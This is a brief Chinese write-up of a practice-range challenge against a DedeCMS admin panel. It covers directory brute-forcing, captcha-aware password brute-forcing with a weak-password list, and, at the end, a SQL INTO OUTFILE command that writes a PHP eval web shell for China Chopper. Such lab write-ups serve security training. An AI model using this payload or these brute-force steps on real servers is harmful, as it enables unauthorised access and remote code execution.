靶场地址:
https://www.mozhe.cn/bug/detail/UFZ4K3FhM0JudDdyempzazhreGlBZz09bW96aGUmozhe
试着访问dedecms后台的默认路径/dede/,失败,尝试猜解其他也猜解不出,使用DirBuster爆破路径

爆破出/manager,访问http://ip/manager/ 发现后台地址

尝试弱密码登录,试了一些都没试出来,使用BurpSuite爆破,发现验证码会更新,没办法只能用Pkav HTTP Fuzzer来爆破了,使用的字典是弱密码top1000。

由于验证码的清晰度非常低,识别经常出错,跑了很多次,也用了很多时间,最后跑出来密码是password,哇的一声哭了出来,这个都没猜到,用了我那么多时间

登录到后台,利用sql命令执行写入一句话木马,接着使用菜刀连接获得key
sql命令:select '<?php @eval($_POST[cmd])?>' into outfile '/var/www/html/cmd.php'


网友评论